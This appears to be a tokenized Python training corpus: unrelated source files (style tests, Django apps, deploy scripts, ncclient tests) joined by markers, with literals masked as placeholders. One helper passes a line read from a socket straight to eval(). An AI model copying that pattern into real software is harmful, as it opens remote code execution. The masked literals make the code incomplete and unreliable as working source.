fgColor <EOL> if style . axes . text . size is not None : <EOL> self . axes . text . size = style . axes . text . size <EOL> if style . axes . text . color is not None : <EOL> self . axes . text . color = style . axes . text . color <EOL> if style . axes . bgColor is not None : <EOL> self . axes . bgColor = style . axes . bgColor <EOL> if style . axes . fgColor is not None : <EOL> self . axes . fgColor = style . axes . fgColor <EOL> def _applyStyle ( self , obj , filter , postProcess ) : <EOL> process , recurse = filter ( obj ) <EOL> if not process : <EOL> return <EOL> if self . figure . text . size is not None : <EOL> obj . figureTextSize = self . figure . text . size <EOL> if self . figure . text . color is not None : <EOL> obj . figureTextColor = self . figure . text . color <EOL> if self . figure . bgColor is not None : <EOL> obj . figureBgColor = self . figure . bgColor <EOL> if self . figure . fgColor is not None : <EOL> obj . figureFgColor = self . figure . fgColor <EOL> if self . axes . text . size is not None : <EOL> obj . axesTextSize = self . axes . text . size <EOL> if self . axes . text . color is not None : <EOL> obj . axesTextColor = self . axes . text . color <EOL> if self . axes . bgColor is not None : <EOL> obj . axesBgColor = self . axes . bgColor <EOL> if self . axes . fgColor is not None : <EOL> obj . axesFgColor = self . axes . fgColor <EOL> postProcess ( obj ) <EOL> class TestStyle ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def checkObj ( self , name , obj , style ) : <EOL> """<STR_LIT>""" <EOL> attrs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> for key in attrs : <EOL> desired = style . getValue ( '<STR_LIT>' % attrs [ key ] ) <EOL> actual = getattr ( obj , '<STR_LIT>' % key ) <EOL> msg = "<STR_LIT>" % ( name , key ) <EOL> self . assertEqual ( desired , actual , msg = msg ) <EOL> desired = style . getValue ( '<STR_LIT>' % attrs [ key ] ) <EOL> actual = getattr ( obj , '<STR_LIT>' % key ) <EOL> msg = "<STR_LIT>" % ( name , key ) <EOL> self . assertEqual ( desired , actual , msg = msg ) <EOL> def checkDataEq ( self , name , desired , actual ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( desired , S . types . Data ) and isinstance ( actual , S . types . Data ) : <EOL> self . assertEqual ( desired . keys ( ) , actual . keys ( ) , <EOL> msg = "<STR_LIT>" % ( name , ) ) <EOL> for key in desired : <EOL> self . checkDataEq ( '<STR_LIT>' % ( name , key ) , desired [ key ] , actual [ key ] ) <EOL> else : <EOL> self . assertEqual ( desired , actual , <EOL> msg = "<STR_LIT>" % ( name , ) ) <EOL> def checkStyleEq ( self , name , desired , actual ) : <EOL> """<STR_LIT>""" <EOL> self . checkDataEq ( '<STR_LIT>' % name , desired . figure , actual . figure ) <EOL> self . checkDataEq ( '<STR_LIT>' % name , desired . axes , actual . axes ) <EOL> def testBasic ( self ) : <EOL> """<STR_LIT>""" <EOL> style1 = MyStyle ( '<STR_LIT>' ) <EOL> style1 . figure . text . size = <NUM_LIT:12> <EOL> style1 . axes . text . size = <NUM_LIT:8> <EOL> style2 = MyStyle ( '<STR_LIT>' ) <EOL> style2 . figure . bgColor = '<STR_LIT>' <EOL> style2 . axes . bgColor = '<STR_LIT>' <EOL> style3 = MyStyle ( '<STR_LIT>' , parent = style1 ) <EOL> style3 . figure . text . size = <NUM_LIT> <EOL> style4 = MyStyle ( '<STR_LIT>' ) <EOL> style4 . figure . text . size = <NUM_LIT> <EOL> style4 . axes . text . size = <NUM_LIT:8> <EOL> style4 . figure . bgColor = '<STR_LIT>' <EOL> style4 . axes . bgColor = '<STR_LIT>' <EOL> style5 = MyStyle ( '<STR_LIT>' ) <EOL> style5 . figure . text . size = <NUM_LIT> <EOL> style5 . figure . bgColor = '<STR_LIT>' <EOL> style5 . axes . bgColor = '<STR_LIT>' <EOL> style6 = MyStyle ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> style7 = MyStyle ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : style1 , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( "<STR_LIT>" , style1 . name , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT:12> , style1 . figure . text . size , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT> , style3 . figure . text . size , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT:12> , style1 . getValue ( '<STR_LIT>' ) , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT> , style3 . getValue ( '<STR_LIT>' ) , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( None , style3 . getValue ( '<STR_LIT>' ) , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT:8> , style3 . getResolvedValue ( '<STR_LIT>' ) , msg = msg ) <EOL> newStyle = style3 . resolve ( '<STR_LIT>' , style2 ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style4 , newStyle ) <EOL> newStyle = style3 . copy ( '<STR_LIT>' ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style3 , newStyle ) <EOL> newStyle . update ( style2 ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style5 , newStyle ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style5 , style6 ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style3 , style7 ) <EOL> def customFunc ( obj ) : <EOL> obj . figureBgColor = '<STR_LIT>' <EOL> obj . axesBgColor = '<STR_LIT>' <EOL> style3 . custom = customFunc <EOL> obj = S . types . Data ( <EOL> figureTextSize = None , <EOL> figureTextColor = None , <EOL> figureBgColor = None , <EOL> figureFgColor = None , <EOL> axesTextSize = None , <EOL> axesTextColor = None , <EOL> axesBgColor = None , <EOL> axesFgColor = None , <EOL> ) <EOL> style3 . apply ( obj ) <EOL> self . checkObj ( '<STR_LIT>' , obj , style4 ) <EOL> self . assertEqual ( False , style3 . canApply ( obj ) , msg = "<STR_LIT>" ) <EOL> style1 . setValue ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT:10> , style1 . getValue ( '<STR_LIT>' ) , msg = msg ) <EOL> newStyle = MyStyle . resolveStyles ( None , style1 ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style1 , newStyle ) <EOL> newStyle = MyStyle . resolveStyles ( None , [ style2 , style3 ] ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style4 , newStyle ) <EOL> def testMultiParents ( self ) : <EOL> """<STR_LIT>""" <EOL> style1 = MyStyle ( '<STR_LIT>' ) <EOL> style1 . figure . text . size = <NUM_LIT:12> <EOL> style1 . figure . text . color = '<STR_LIT>' <EOL> style1 . axes . text . size = <NUM_LIT:8> <EOL> style1 . axes . text . color = '<STR_LIT>' <EOL> style2 = MyStyle ( '<STR_LIT>' ) <EOL> style2 . figure . bgColor = '<STR_LIT>' <EOL> style2 . axes . bgColor = '<STR_LIT>' <EOL> style2 . axes . text . color = '<STR_LIT>' <EOL> style3 = MyStyle ( '<STR_LIT>' , parent = style1 ) <EOL> style3 . figure . text . size = <NUM_LIT> <EOL> style3 . figure . fgColor = '<STR_LIT>' <EOL> style4 = MyStyle ( '<STR_LIT>' , parent = [ style3 , style2 ] ) <EOL> style4 . figure . fgColor = '<STR_LIT>' <EOL> style4 . axes . fgColor = '<STR_LIT>' <EOL> style5 = MyStyle ( '<STR_LIT>' ) <EOL> style5 . figure . text . size = <NUM_LIT> <EOL> style5 . figure . text . color = '<STR_LIT>' <EOL> style5 . figure . bgColor = '<STR_LIT>' <EOL> style5 . figure . fgColor = '<STR_LIT>' <EOL> style5 . axes . text . size = <NUM_LIT:8> <EOL> style5 . axes . text . color = '<STR_LIT>' <EOL> style5 . axes . bgColor = '<STR_LIT>' <EOL> style5 . axes . fgColor = '<STR_LIT>' <EOL> newStyle = style4 . resolve ( '<STR_LIT>' ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style5 , newStyle ) <EOL> def testErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> style1 = MyStyle ( '<STR_LIT>' ) <EOL> style1 . figure . text . size = <NUM_LIT:12> <EOL> style1 . axes . text . size = <NUM_LIT:8> <EOL> msg = "<STR_LIT>" <EOL> self . assertRaises ( Exception , style1 . getValue , '<STR_LIT>' , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertRaises ( Exception , style1 . getValue , '<STR_LIT>' , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertRaises ( Exception , style1 . setValue , '<STR_LIT>' , '<STR_LIT>' , msg = msg ) </s>
<s> import sys <EOL> from tiget . git import init_repo , GitError <EOL> from tiget . utils import print_error , post_mortem <EOL> from tiget . plugins import load_plugin <EOL> def main ( ) : <EOL> load_plugin ( '<STR_LIT>' ) <EOL> try : <EOL> init_repo ( ) <EOL> except GitError as e : <EOL> print_error ( e ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> except Exception as e : <EOL> post_mortem ( ) <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> def get ( ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT> </s>
<s> import os <EOL> import socket <EOL> import sys <EOL> import httplib <EOL> import time <EOL> import StringIO <EOL> from db_status import DBStatus <EOL> from trace_event import * <EOL> _is_prelaunched_process = False <EOL> def is_prelaunched_process ( ) : <EOL> return _is_prelaunched_process <EOL> def wait_for_command ( control_port ) : <EOL> global _is_prelaunched_process <EOL> _is_prelaunched_process = True <EOL> s = socket . socket ( ) <EOL> try : <EOL> trace_begin ( "<STR_LIT>" ) <EOL> bound = False <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> try : <EOL> s . bind ( ( "<STR_LIT>" , control_port ) ) <EOL> bound = True <EOL> break <EOL> except socket . error : <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> if not bound : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> trace_end ( "<STR_LIT>" ) <EOL> s . listen ( <NUM_LIT:1> ) <EOL> trace_begin ( "<STR_LIT>" ) <EOL> c , a = s . accept ( ) <EOL> trace_end ( "<STR_LIT>" ) <EOL> f = c . makefile ( ) <EOL> trace_begin ( "<STR_LIT>" ) <EOL> args = eval ( f . readline ( ) , { } , { } ) <EOL> trace_end ( "<STR_LIT>" ) <EOL> import quickopen <EOL> import optparse <EOL> old_stdout = sys . stdout <EOL> new_stdout = StringIO . StringIO ( ) <EOL> sys . stdout = new_stdout <EOL> old_argv = sys . argv <EOL> try : <EOL> sys . argv = [ sys . argv [ <NUM_LIT:0> ] ] <EOL> sys . argv . extend ( args ) <EOL> parser = optparse . OptionParser ( usage = quickopen . main_usage ( ) ) <EOL> quickopen . main ( parser ) <EOL> except : <EOL> sys . stdout = old_stdout <EOL> import traceback <EOL> traceback . print_exc ( ) <EOL> finally : <EOL> sys . argv = old_argv <EOL> sys . stdout = old_stdout <EOL> trace_end ( "<STR_LIT>" ) <EOL> v = new_stdout . getvalue ( ) <EOL> f . write ( repr ( v ) ) <EOL> f . write ( "<STR_LIT:\n>" ) <EOL> f . close ( ) <EOL> finally : <EOL> s . close ( ) <EOL> sys . exit ( <NUM_LIT:0> ) </s>
<s> import os <EOL> import re <EOL> import yaml <EOL> from fabric . colors import green , red , yellow <EOL> DEPLOY_YAML = os . path . join ( os . getcwd ( ) , '<STR_LIT>' ) <EOL> def _create_deploy_yaml ( site ) : <EOL> _green ( "<STR_LIT>" ) <EOL> _write_file ( DEPLOY_YAML , yaml . safe_dump ( site , default_flow_style = False ) ) <EOL> _green ( "<STR_LIT>" % DEPLOY_YAML ) <EOL> def _validate_django_settings ( django_settings ) : <EOL> django_settings_regex = r"<STR_LIT>" <EOL> pattern = re . compile ( django_settings_regex ) <EOL> if not pattern . match ( django_settings ) : <EOL> raise ValueError ( red ( "<STR_LIT>" ) ) <EOL> django_settings_path = django_settings . replace ( '<STR_LIT:.>' , '<STR_LIT:/>' ) + '<STR_LIT>' <EOL> if not os . path . exists ( django_settings_path ) : <EOL> raise ValueError ( red ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) ) <EOL> return django_settings <EOL> def _validate_project_name ( project_name ) : <EOL> project_name_regex = r"<STR_LIT>" <EOL> pattern = re . compile ( project_name_regex ) <EOL> if not pattern . match ( project_name ) : <EOL> raise ValueError ( red ( "<STR_LIT>" ) ) <EOL> if not os . path . exists ( os . path . join ( os . getcwd ( ) , project_name ) ) : <EOL> raise ValueError ( red ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) ) <EOL> return project_name <EOL> def _validate_requirements ( requirements ) : <EOL> if not requirements . endswith ( "<STR_LIT>" ) : <EOL> raise ValueError ( red ( "<STR_LIT>" ) ) <EOL> if not os . path . exists ( os . path . join ( os . getcwd ( ) , requirements ) ) : <EOL> raise ValueError ( red ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) ) <EOL> return requirements <EOL> def _validate_managepy ( managepy ) : <EOL> managepy_regex = r"<STR_LIT>" <EOL> pattern = re . compile ( managepy_regex ) <EOL> if not pattern . match ( managepy ) : <EOL> raise ValueError ( red ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) ) <EOL> if not os . path . exists ( os . path . join ( os . getcwd ( ) , managepy ) ) : <EOL> raise ValueError ( red ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) ) <EOL> return managepy <EOL> def _validate_admin_password ( admin_password ) : <EOL> password_regex = r"<STR_LIT>" <EOL> pattern = re . compile ( password_regex ) <EOL> if not pattern . match ( admin_password ) : <EOL> raise ValueError ( red ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) ) <EOL> return admin_password <EOL> def _validate_providers ( provider ) : <EOL> providers = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if provider not in providers : <EOL> raise ValueError ( red ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT:%s>" % providers <EOL> ) ) <EOL> return provider <EOL> def _write_file ( path , contents ) : <EOL> file = open ( path , '<STR_LIT:w>' ) <EOL> file . write ( contents ) <EOL> file . close ( ) <EOL> def _read_file ( path ) : <EOL> file = open ( path , '<STR_LIT:r>' ) <EOL> contents = file . read ( ) <EOL> file . close ( ) <EOL> return contents <EOL> def _join ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( * args ) <EOL> def _green ( text ) : <EOL> print green ( text ) <EOL> def _red ( text ) : <EOL> print red ( text ) <EOL> def _yellow ( text ) : <EOL> print yellow ( text ) </s>
<s> from django . db import models <EOL> from django . contrib . auth . models import User <EOL> from Project import Project <EOL> class AuthorRequest ( models . Model ) : <EOL> class Meta : <EOL> app_label = '<STR_LIT>' <EOL> user = models . ForeignKey ( User ) <EOL> project = models . ForeignKey ( Project ) <EOL> autodetected = models . BooleanField ( default = False ) <EOL> def approve ( self ) : <EOL> self . project . authors . add ( self . user ) <EOL> self . project . save ( ) <EOL> self . delete ( ) <EOL> def reject ( self ) : <EOL> self . delete ( ) </s>
<s> from django . contrib . auth . models import User <EOL> from django . core . urlresolvers import reverse <EOL> from django . http import HttpResponseRedirect , Http404 <EOL> from django . template import RequestContext <EOL> from django . shortcuts import render_to_response , get_object_or_404 <EOL> from dashboard . models import * <EOL> from dashboard . util import force_url_paths , avoid_duplicate_queries <EOL> from lib . InheritanceQuerySet import InheritanceQuerySet <EOL> from observatory . dashboard . views import commits , blogs <EOL> from django . db import connection <EOL> INDEX_EVENT_COUNT = <NUM_LIT:100> <EOL> def feed ( request ) : <EOL> qs = InheritanceQuerySet ( model = Event ) <EOL> objs = qs . select_subclasses ( ) . order_by ( '<STR_LIT:date>' ) . reverse ( ) [ : INDEX_EVENT_COUNT ] <EOL> avoid_duplicate_queries ( objs , "<STR_LIT>" , "<STR_LIT>" , <EOL> author = { request . user . id : request . user } <EOL> if request . user . is_authenticated ( ) else { } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : objs , <EOL> '<STR_LIT>' : True <EOL> } , context_instance = RequestContext ( request ) ) <EOL> def event ( request , url_path ) : <EOL> resp = force_url_paths ( event , url_path ) <EOL> if resp : return resp <EOL> try : <EOL> qs = InheritanceQuerySet ( model = Event ) <EOL> the_event = qs . select_subclasses ( ) . get ( url_path = url_path ) <EOL> except : <EOL> raise Http404 <EOL> if the_event . __class__ is Commit : <EOL> return HttpResponseRedirect ( reverse ( commits . show , <EOL> args = ( the_event . project . url_path , <EOL> the_event . url_path , ) ) ) <EOL> else : <EOL> if the_event . project is not None : <EOL> return HttpResponseRedirect ( reverse ( blogs . show_post , <EOL> args = ( the_event . project . url_path , <EOL> the_event . url_path , ) ) ) <EOL> else : <EOL> return HttpResponseRedirect ( reverse ( blogs . show_user_post , <EOL> args = ( the_event . author . id , <EOL> the_event . url_path , ) ) ) <EOL> raise Http404 </s>
<s> from __init__ import message , CRITICAL <EOL> import sys <EOL> def importETree ( ) : <EOL> """<STR_LIT>""" <EOL> etree_in_c = None <EOL> try : <EOL> import xml . etree . cElementTree as etree_in_c <EOL> except ImportError : <EOL> try : <EOL> import xml . etree . ElementTree as etree <EOL> except ImportError : <EOL> try : <EOL> import cElementTree as etree_in_c <EOL> except ImportError : <EOL> try : <EOL> import elementtree . ElementTree as etree <EOL> except ImportError : <EOL> message ( CRITICAL , "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if etree_in_c and etree_in_c . VERSION < "<STR_LIT:1.0>" : <EOL> message ( CRITICAL , "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> elif etree_in_c : <EOL> return etree_in_c <EOL> elif etree . VERSION < "<STR_LIT>" : <EOL> message ( CRITICAL , "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> return etree </s>
<s> class BaseRepository ( object ) : <EOL> def __init__ ( self , path , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . path = path <EOL> self . extra = kwargs <EOL> def get_commit_by_id ( self , commit_id ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def get_recent_commits ( self , since = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def list_directory ( self , path , revision = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def file_contents ( self , path , revision = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError </s>
<s> """<STR_LIT>""" </s>
<s> from django . conf . urls import * <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , <EOL> view = '<STR_LIT>' , <EOL> name = '<STR_LIT>' <EOL> ) , <EOL> url ( r'<STR_LIT>' , <EOL> view = '<STR_LIT>' , <EOL> name = '<STR_LIT>' <EOL> ) , <EOL> url ( r'<STR_LIT>' , <EOL> view = '<STR_LIT>' , <EOL> name = '<STR_LIT>' <EOL> ) , <EOL> ) </s>
<s> from django import forms <EOL> from django . contrib . auth . models import User <EOL> from basic . messages . models import Message <EOL> class MessageForm ( forms . ModelForm ) : <EOL> to_user = forms . CharField ( ) <EOL> class Meta : <EOL> model = Message <EOL> exclude = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def clean_to_user ( self ) : <EOL> if self . cleaned_data [ '<STR_LIT>' ] : <EOL> try : <EOL> user = User . objects . get ( username = self . cleaned_data [ '<STR_LIT>' ] ) <EOL> self . cleaned_data [ '<STR_LIT>' ] = user <EOL> return self . cleaned_data [ '<STR_LIT>' ] <EOL> except User . DoesNotExist : <EOL> pass <EOL> raise forms . ValidationError ( u'<STR_LIT>' ) </s>
<s> from django . conf . urls import * <EOL> USERNAME = r'<STR_LIT>' <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , <EOL> view = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> url ( r'<STR_LIT>' % USERNAME , <EOL> view = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> url ( r'<STR_LIT>' , <EOL> view = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from django . conf . urls . defaults import * <EOL> from django . views . generic . simple import direct_to_template <EOL> from registration . views import activate <EOL> from registration . views import register <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , <EOL> register , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> direct_to_template , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> name = '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ) </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> install_requires = [ '<STR_LIT>' , ] , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from os import getenv , chdir <EOL> from re import sub <EOL> from subprocess import check_output , check_call <EOL> from tempfile import mkdtemp <EOL> from shutil import rmtree <EOL> if getenv ( '<STR_LIT>' ) != '<STR_LIT>' : <EOL> print "<STR_LIT>" <EOL> exit ( ) <EOL> if getenv ( '<STR_LIT>' ) != '<STR_LIT>' : <EOL> print "<STR_LIT>" <EOL> exit ( ) <EOL> if getenv ( '<STR_LIT>' ) != '<STR_LIT:false>' : <EOL> print "<STR_LIT>" <EOL> exit ( ) <EOL> repo = check_output ( "<STR_LIT>" , shell = True ) <EOL> repo = sub ( r'<STR_LIT>' , '<STR_LIT>' , repo ) . strip ( ) <EOL> deploy_url = sub ( r'<STR_LIT>' , '<STR_LIT>' % getenv ( '<STR_LIT>' ) , repo ) <EOL> deploy_branch = '<STR_LIT>' <EOL> rev = check_output ( "<STR_LIT>" , shell = True ) . strip ( ) <EOL> dir = mkdtemp ( ) <EOL> check_call ( "<STR_LIT>" % ( deploy_branch , repo , dir ) , shell = True ) <EOL> chdir ( dir ) <EOL> check_call ( "<STR_LIT>" , shell = True ) <EOL> print "<STR_LIT>" <EOL> check_call ( "<STR_LIT>" % getenv ( '<STR_LIT>' ) , shell = True ) <EOL> check_call ( "<STR_LIT>" % getenv ( '<STR_LIT>' ) , shell = True ) <EOL> check_call ( "<STR_LIT>" % rev , shell = True ) <EOL> check_call ( "<STR_LIT>" % ( deploy_url , deploy_branch ) , shell = True ) <EOL> chdir ( getenv ( '<STR_LIT>' ) ) <EOL> rmtree ( dir ) <EOL> print "<STR_LIT>" </s>
<s> from robotpageobjects import Page <EOL> class StackTracePage ( Page ) : <EOL> uri = "<STR_LIT>" <EOL> def raise_division_by_zero ( self ) : <EOL> <NUM_LIT:1> / <NUM_LIT:0> <EOL> return self </s>
<s> import unittest <EOL> from po . loggingpage import LoggingPage <EOL> class LoggingTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . p = LoggingPage ( ) <EOL> def test_log_to_file_and_screen ( self ) : <EOL> self . p . log_warning ( "<STR_LIT>" ) <EOL> unittest . main ( ) </s>
<s> from ncclient import manager <EOL> def connect ( host , port , user ) : <EOL> conn = manager . connect ( host = host , <EOL> port = port , <EOL> username = user , <EOL> timeout = <NUM_LIT:10> , <EOL> device_params = { '<STR_LIT:name>' : '<STR_LIT>' } , <EOL> hostkey_verify = False ) <EOL> result = conn . get_software_information ( '<STR_LIT>' , test = '<STR_LIT>' ) <EOL> print '<STR_LIT>' , result . xpath ( '<STR_LIT>' ) [ <NUM_LIT:0> ] . text <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> connect ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT>' ) </s>
<s> from ncclient import NCClientError <EOL> class OperationError ( NCClientError ) : <EOL> pass <EOL> class TimeoutExpiredError ( NCClientError ) : <EOL> pass <EOL> class MissingCapabilityError ( NCClientError ) : <EOL> pass </s>
<s> from ncclient . operations . lock import * <EOL> import unittest <EOL> from mock import patch <EOL> from ncclient import manager <EOL> import ncclient . manager <EOL> import ncclient . transport <EOL> from ncclient . xml_ import * <EOL> from ncclient . operations import RaiseMode <EOL> from xml . etree import ElementTree <EOL> class TestLock ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . device_handler = manager . make_device_handler ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_lock_default_param ( self , mock_request , mock_session ) : <EOL> session = ncclient . transport . SSHSession ( self . device_handler ) <EOL> obj = Lock ( session , self . device_handler , raise_mode = RaiseMode . ALL ) <EOL> obj . request ( ) <EOL> node = new_ele ( "<STR_LIT>" ) <EOL> sub_ele ( sub_ele ( node , "<STR_LIT:target>" ) , "<STR_LIT>" ) <EOL> xml = ElementTree . tostring ( node , method = '<STR_LIT>' ) <EOL> call = mock_request . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> call = ElementTree . tostring ( call , method = '<STR_LIT>' ) <EOL> self . assertEqual ( call , xml ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_lock ( self , mock_request , mock_session ) : <EOL> session = ncclient . transport . SSHSession ( self . device_handler ) <EOL> obj = Lock ( session , self . device_handler , raise_mode = RaiseMode . ALL ) <EOL> obj . request ( target = "<STR_LIT>" ) <EOL> node = new_ele ( "<STR_LIT>" ) <EOL> sub_ele ( sub_ele ( node , "<STR_LIT:target>" ) , "<STR_LIT>" ) <EOL> xml = ElementTree . tostring ( node , method = '<STR_LIT>' ) <EOL> call = mock_request . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> call = ElementTree . tostring ( call , method = '<STR_LIT>' ) <EOL> self . assertEqual ( call , xml ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_unlock_default_param ( self , mock_request , mock_session ) : <EOL> session = ncclient . transport . SSHSession ( self . device_handler ) <EOL> obj = Unlock ( session , self . device_handler , raise_mode = RaiseMode . ALL ) <EOL> obj . request ( ) <EOL> node = new_ele ( "<STR_LIT>" ) <EOL> sub_ele ( sub_ele ( node , "<STR_LIT:target>" ) , "<STR_LIT>" ) <EOL> xml = ElementTree . tostring ( node , method = '<STR_LIT>' ) <EOL> call = mock_request . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> call = ElementTree . tostring ( call , method = '<STR_LIT>' ) <EOL> self . assertEqual ( call , xml ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_unlock ( self , mock_request , mock_session ) : <EOL> session = ncclient . transport . SSHSession ( self . device_handler ) <EOL> obj = Unlock ( session , self . device_handler , raise_mode = RaiseMode . ALL ) <EOL> obj . request ( target = "<STR_LIT>" ) <EOL> node = new_ele ( "<STR_LIT>" ) <EOL> sub_ele ( sub_ele ( node , "<STR_LIT:target>" ) , "<STR_LIT>" ) <EOL> xml = ElementTree . tostring ( node , method = '<STR_LIT>' ) <EOL> call = mock_request . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> call = ElementTree . tostring ( call , method = '<STR_LIT>' ) <EOL> self . assertEqual ( call , xml ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_lock_context_enter ( self , mock_request , mock_session ) : <EOL> session = ncclient . transport . SSHSession ( self . device_handler ) <EOL> obj = LockContext ( session , self . device_handler , "<STR_LIT>" ) <EOL> self . assertEqual ( obj . __enter__ ( ) , obj ) <EOL> node = new_ele ( "<STR_LIT>" ) <EOL> sub_ele ( sub_ele ( node , "<STR_LIT:target>" ) , "<STR_LIT>" ) <EOL> xml = ElementTree . tostring ( node , method = '<STR_LIT>' ) <EOL> call = mock_request . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> call = ElementTree . tostring ( call , method = '<STR_LIT>' ) <EOL> self . assertEqual ( call , xml ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_lock_context_exit ( self , mock_request , mock_session ) : <EOL> session = ncclient . transport . SSHSession ( self . device_handler ) <EOL> obj = LockContext ( session , self . device_handler , "<STR_LIT>" ) <EOL> self . assertFalse ( obj . __exit__ ( ) ) <EOL> node = new_ele ( "<STR_LIT>" ) <EOL> sub_ele ( sub_ele ( node , "<STR_LIT:target>" ) , "<STR_LIT>" ) <EOL> xml = ElementTree . tostring ( node , method = '<STR_LIT>' ) <EOL> call = mock_request . call_args_list [ <NUM_LIT:0> 